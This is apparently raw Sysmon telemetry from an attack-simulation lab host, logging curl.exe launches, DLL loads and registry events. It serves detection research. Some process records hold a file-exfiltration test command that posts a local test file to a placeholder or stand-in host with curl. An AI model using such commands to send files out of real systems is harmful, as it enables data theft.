DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055296093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055296092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-92C8-616D-4F11-01000000F101}53165996C:\Windows\system32\conhost.exe{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055296091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055296090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055296089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055296088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000055296087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000055296086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055296085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.765{8B6011A9-92C8-616D-4E11-01000000F101}68126400C:\Windows\system32\cmd.exe{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055296084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:46.746{8B6011A9-E4F2-618B-96A5-04000000F101}7664C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.execurl.exe -d c:\temp\atomictestfile.txt #{remote_destination}c:\Temp\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 534500x800000000000000055296177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.344{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exe 734700x800000000000000055296176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.291{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000055296175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000055296174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055296173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055296172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055296171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055296170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000055296169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055296168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000055296167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000055296166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000055296165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000055296164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.275{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000055296163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055296162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055296161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055296160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055296159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055296158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055296157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055296156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055296155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055296154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055296153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055296152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055296151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055296150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055296149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055296148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055296147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055296146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-92C8-616D-4F11-01000000F101}53165996C:\Windows\system32\conhost.exe{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055296145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055296144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055296143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055296142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000055296141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.260{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000055296140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.245{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055296139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.245{8B6011A9-92C8-616D-4E11-01000000F101}68126400C:\Windows\system32\cmd.exe{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\system32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055296138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:27:54.236{8B6011A9-E4FA-618B-97A5-04000000F101}216C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.execurl.exe -d c:\temp\atomictestfile.txt www.example.comc:\Temp\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 534500x800000000000000055297903Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.173{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exe 734700x800000000000000055297902Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055297901Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055297900Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055297899Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055297898Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055297897Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:30:21.157{8B6011A9-E58D-618B-A9A5-04000000F101}6308C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055297896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 